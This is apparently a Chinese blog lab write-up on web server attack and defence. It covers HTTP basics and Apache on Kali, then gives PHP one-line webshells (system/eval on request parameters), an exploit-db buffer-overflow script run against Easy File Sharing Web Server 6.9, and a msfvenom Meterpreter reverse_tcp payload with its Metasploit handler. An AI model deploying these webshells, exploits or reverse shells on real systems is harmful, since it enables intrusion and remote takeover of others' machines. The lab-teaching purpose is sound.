Web服务器漏洞攻防实战(网站简单配置和远程控制)

原创 已于 2025-12-10 18:28:32 修改 · 879 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #运维 #网络安全

于 2025-12-10 18:18:18 首次发布

2025博客之星年度评选已开启 10w+人浏览 1.1k人参与

网站Web Sever服务器提供服务   URL-Uniform Resource Locator

包含协议、主机、端口、路径

域名:类似http://www.qq.com,其中port、path没写出来就是延用默认的知名端口等

例如http-80端口;https-443端口;或者是自己自定义的端口

GET方法的数据传输是通过URL传递

POST方法的数据传输是通过HTTP请求体传递

在wireshark中可以使用这样的过滤语句:http.request.method==POST,来查看想要看的数据流

GET和POST

GET和POST是两种最基本的HTTP请求方法。

HTTP-Hypertext Transfer Protocol 超文本传输协议,用于在Web浏览器和Web服务器之间传输数据。

HTTP请求方法定义了Web浏览器如何向Web服务器发送请求。GET和POST是最常用的HTTP请求方法之一。

GET方法用于从Web服务器请求数据。在使用GET方法时,浏览器向Web服务器发送一个请求,Web服务器将响应数据发送回浏览器。如HTML页面、图片和CSS文件等。

例如:http://example.com/page?name=value&age=value

POST方法用于向Web服务器提交数据。在使用POST方法时,浏览器将数据打包并发送到Web服务器。提交表单数据和上传文件等操作。

Web服务器收到数据后,可以根据数据执行相应的操作,并向浏览器发送响应。

前端和后端

kali配置网站

Apache默认的网站目录是在/var/www/html

访问网站即直达该目录(默认-无需输入路径)中的index.html

开启Kali的Apahce:service apache2 start

另一台主机浏览器访问   http://Kali的IP地址

一句话木马

一句话木马:<?php system($_REQUEST [‘hello’]);?>   命名为hello.php(也可以命名为其他的名字)

system函数可以用来执行命令并将相应的执行结果输出

$_REQUEST [‘hello’]获取用户提交的数据

http://靶机IP地址/hello.php?hello=ifconfig

问号后面的字符串是用户输入的(提交的),需要传递给服务器的参数:参数名=参数值;多个参数则用&分隔

漏洞测试模块

https://www.exploit-db.com

Kali系统自带漏洞库exploit-db

命令searchsploit查找渗透模块

Windows 安装Easy File Sharing Web Server 存在远程溢出漏洞

这里我在虚拟机进行测试

软件运行界面,可见http服务所使用的端口号为80,服务器IP为192.168.91.136

然后切换到kali,使用nmap工具扫描上面的服务器IP,并加上-sV参数以查看各开放端口所使用的服务名称和版本号:

可见与各服务与端口的对应与软件界面显示的相同,同时还将服务的版本号展示出来了。

看到该服务器开放Easy File Sharing Web Server httpd 6.9,在网上搜索知道该版本存在的缓冲区溢出漏洞,下面开始利用该漏洞对服务器进行攻击。

漏洞利用

首先,在kali中访问存在漏洞的服务端口192.168.91.136:80

根据上面的漏洞描述,该版本对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,当用户输入太长的用户名会导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址。

先来测试下该漏洞,先输入正常长度的用户名来Login:

可以看到网页正常响应,接下来我们用ai生成一个6000字的用户名

粘贴到Username栏中再Login,发现此时网页无响应:

回到win10发现软件已崩溃:

Kali中searchsploit查EasyFileSharing存在的漏洞:

经过查阅可知,蓝色框内的脚本可以实现再目标计算机执行计算器程序的功能。

同时该模块的调用也很简单,只需在终端中运行时加上服务器ip和端口作为两个参数传入即可:

python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.91.136 80

运行成功,回到win10中查看,关闭之前崩溃的程序,计算器自动打开,复现完成:

Kali中生成被控端

Msfvenom

用到参数-p、-f 、-o

-p windows/meterpreter/reverse_tcp LHOST=192.168.91.136 LPORT=5000 -f exe –o /root/payload.exe

-p, –payload Payload to use;指定哪些有效载荷生成

本例中  windows/meterpreter/reverse_tcp   :用于Windows平台的反向远程控制程序

-f, –format Output format;指定有效载荷的格式

本例中  exe   生成Windows系统的可执行文件
-o, –out Save the payload;指定保存位置

本例中 /root/payload.exe

Kali中启动主控端

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload  windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 expolit(multi/handler) > set lhost 192.168.91.134

lhost => 192.168.91.134

msf5 exploit(multi/handler) > set lport 5000

lport => 5000

msf5 exploit(multi/handler) > exploit

这样就成功了,但是我们在日常生活中不要随意这样做,不要随意点击任何不知名的软件或者链接

生成的被控端提交到www.virustotal.com检测:

蚁剑

在虚拟机上的"E:\phpstudy_pro\WWW\"文件夹创建“shell.php”并输入以下php代码

<?php eval($_REQUEST ['cmd']);?>

然后我们打开蚁剑,右键添加数据:

要注意的是http://你主机的ip/shell.php,密码就是你shell中的cmd.

这样就成功了,但是我们在日常生活中不要随意这样做

2024三掌柜赠书活动第十期:Web漏洞解析与攻防实战
全沾软贱开发攻城狮
02-21 1万+
我们通过了解不同类型的Web漏洞、实施安全评估修复、模拟攻击等措施,可以加固系统的安全性,保护用户的个人信息敏感数据,还有就是持续关注最新的漏洞安全威胁也是非常重要的,以便及时采取措施应对新的攻击方式。本书共11章,分别为Web安全概述、计算机网络基础知识、测试工具与靶场环境搭建、传统后端漏洞(上、下)、前端漏洞(上、下)、新后端漏洞(上、下)、逻辑漏洞(上、下),每章以不同的漏洞类型为小节内容,尽可能涵盖已发现公开的所有重大Web安全漏洞类型。同时,定期进行安全更新漏洞扫描也是非常重要的。
php网站渗透实战_PHP文件包含漏洞攻防实战
weixin_39884492的博客
12-19 845
摘要PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞。利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细的分析,并通过一个真实案例演示了如何利用PHP文件包含漏洞对目标网站进行渗透测试,最终成功获取到网站WebShell。1. PHP...
web安全】远程命令执行(RCE)漏洞深度解析与攻防实践
KP_0x01的博客
04-18 1452
RCE漏洞是指攻击者能够通过Web应用程序在远程服务器上执行任意操作系统命令的安全缺陷。这类漏洞通常源于应用程序将用户可控的输入直接拼接到系统命令中执行,且缺乏足够的过滤验证。RCE漏洞因其直接导致系统沦陷的高危害性,始终位居Web安全威胁榜首。防御RCE需要开发人员安全团队共同努力,从安全编码、输入验证、系统加固等多层面构建防护体系。随着攻击技术的不断演进,防御策略也需要持续更新,建议定期进行安全审计渗透测试,确保系统防护有效性。
web安全攻防渗透测试实战指南
热门推荐
jhf223344的博客
04-05 1万+
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclude 19...
006_Web安全攻防实战Web应用程序框架漏洞分析与防护策略
欢迎来到智能安全前线!这里是AI与信息安全交汇之地。我们以代码为武器,深入大模型攻防实战,破解系统漏洞。追踪OpenAI、Meta前沿动态,用红蓝对抗思维,锻造智能时代的坚盾与利矛。
10-08 749
本文系统分析了现代Web框架的安全漏洞及其防护策略。随着Web应用复杂度提升,框架安全风险日益突出,2025年报告显示75%的漏洞与框架相关。文章重点剖析了Python(Django、Flask)、Java(Spring)Node.js(Express)等主流框架的典型漏洞,包括SQL注入、CSRF绕过等,并提供了修复建议。当前趋势显示,零信任架构、AI安全检测等新技术正被集成到框架中。开发者需及时更新框架版本,严格配置安全参数,以构建更安全的Web应用。
web安全攻防入门教程(适合新手小白围观)
2401_84618514的博客
05-30 1031
本文介绍了Web安全攻防的基础知识,涵盖三大核心目标(机密性、完整性、可用性)常见Web攻击方式,包括SQL注入、XSS、CSRF等。同时提供了防御措施,如输入验证、参数化查询、CSP策略等,并推荐了渗透测试工具(Burp Suite、OWASP ZAP)学习资源(OWASP、Hack The Box)。适合初学者了解Web安全的基本概念实战方法。
Web安全攻防:渗透测试实战指南
qq_67685234的博客
03-10 9882
第一章 渗透测试之信息收集 1.1 收集域名信息 ①得知目标域名 ②获取域名注册信息(域名DNS服务器信息注册人联系信息) 1.1.1 Whois查询 标准互联网协议,收集网络注册信息,注册域名,IP地址等 Kali下的Whois查询 常用网站:爱站工具网(https://whois.aizhan.com) 站长之家(http://whois.chinaz.com) ...
中间件安全系列(六):Tomcat文件读取与Shiro反序列化漏洞攻防实战
tengyuehou的博客
04-10 1405
通过这个漏洞我们可以读取到对方服务器的各种文件信息,如果对方服务器存在文件上传服务,我们可以通过上传jsp的反弹shell脚本,通过这个漏洞来访问这个文件,那么这个文件将会以jS即格式解析,我们就可以获得对方的shell。
网站安全攻防:十大常见漏洞及其防范对策_网络安全攻防演练常用漏洞
ewii12567的博客
11-05 783
*数据来源:**ChatGPT。
DVWA Web漏洞攻防实战指南
Web漏洞实战教程中,作者首先介绍了在Windows环境下设置测试环境的步骤,包括安装IIS(Internet Information Services)作为Web服务器,接着安装PHP以支持动态内容处理,然后是安装MySQL服务器用于数据库存储,...
DVWA实战教程:Web漏洞攻防指南
该教程是一份详细讲解Web安全漏洞实战指南,主要使用DVWA(Damn Vulnerable Web Application)作为实验平台,涵盖了多种常见的Web漏洞类型,包括在WindowsLinux环境下如何设置实验环境。DVWA是一个专门为安全...
香港服务器租用百兆独享带宽与百兆共享带宽有什么区别
SonderCloud_的博客
12-09 542
百兆独享带宽:百兆独享带宽指服务器租用者独自占用 100Mbps 的带宽资源,该带宽通道仅为单台服务器服务,不与其他用户共享。百兆共享带宽:百兆共享带宽指多个服务器租用者共同使用一个 100Mbps 的带宽资源池,所有共享用户的网络请求都通过这个公共 “高速公路” 传输。
软考架构师实战:Spring Boot 3.5 + DeepSeek 开发 AI 应用,上线 24 小时数据复盘(2C1G 服务器抗压实录)
java_yuan的专栏
12-13 400
兄弟们,我又来了。软件架构师实战,我那台服务器是香港的2c1G的,技术栈是 Spring Boot 3.5 + HTMX + DeepSeek 的技术栈。通过首日流量情况、服务器资源占用(CPU/内存)以及遇到的性能瓶颈与优化方案。
linux知识点-内核参数相关
gdpgdp_3的博客
12-11 350
sysctl --system 不指定文件情况默认加载from all system configuration files,如下。sysctl -p 默认(不指定文件情况下)加载 /etc/sysctl.conf 中所有的参数。sysctl --system sysctl -p的区别。
Wokwi@通过RFC2217 TCP 服务器连接到模拟微控制器串口
qq_26074053的博客
12-11 780
【代码】Wokwi@通过RFC2217 TCP 服务器连接到模拟微控制器串口。
国产服务器系统的PXE无人值守自动化安装部署——以银河麒麟、统信UOS、OpenEuler这三类服务器系统为例
CoffeMilk的博客
12-09 351
本文详细介绍了三种国产服务器系统(银河麒麟、统信UOS、OpenEuler)的PXE无人值守自动化安装方法。主要内容包括:1)从系统ISO镜像中提取内核文件根系统文件;2)编写GRUB菜单引导文件;3)配置自动应答文件实现自动化安装;4)重启PXE服务并测试安装过程。文章特别强调了硬盘容量需≥100GB、UEFI模式设置等注意事项,并提供了root密码重置方法。对于x86架构Windows上模拟ARM架构系统安装也给出了具体命令。通过完整的配置流程,可实现国产服务器系统的快速批量部署。
服务器上部署的Mysql,服务器上可登录成功,远程电脑无法连接的
qq_35683545的博客
12-12 665
因为服务器的java程序是mysql在同一台机器,java程序的jdbc的url是localhost:3306,因为mysql安装时默认的root用户,允许的host就是localhost,没有其他ip,不过可以在安装时指定,如果对mysql不熟悉,也可以按上面的第4步添加更改用户host,自然java程序的账号就是root,密码是安装时的设置的密码。8.0以上的一般在1.1。账号是前面第4步或者安装时新添加的用户,如前面所讲,host配置的是“%”号,任何这个用户,只要密码对,就能访问数据库。
Netty(7)如何实现基于Netty的TCP客户端服务器
最新发布
qq_43012298的博客
12-13 340
本文介绍了使用Netty框架实现TCP客户端服务器的基本方法。服务器端通过ServerBootstrap配置NioEventLoopGroup、NioServerSocketChannel字符串编解码器,绑定指定端口启动服务;客户端通过Bootstrap设置NioEventLoopGroup、NioSocketChannel编解码器,连接服务器主机端口。两者都需要自定义ServerHandlerClientHandler来实现业务逻辑处理。代码展示了Netty网络编程的基本结构配置方式,为开发T
screen教程
周周的博客
12-09 780
同样在暂时离开的时候,也可以执行分离命令detach,在保证里面的程序正常运行的情况下让Screen挂起(切换到后台)。会话共享:Screen可以让一个或多个用户从不同终端多次登录一个会话,并共享会话的所有特性(比如可以看到完全相同的输出)。多窗口:在Screen环境下,所有的会话都独立的运行,并拥有各自的编号、输入、输出窗口缓存。你可以在这个房间里跑程序,你人走了(ssh 断了 / Xshell 关了 / 电脑关机),房间还在,程序继续跑。注意:uname -a 看的是“内核”,不是发行版。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值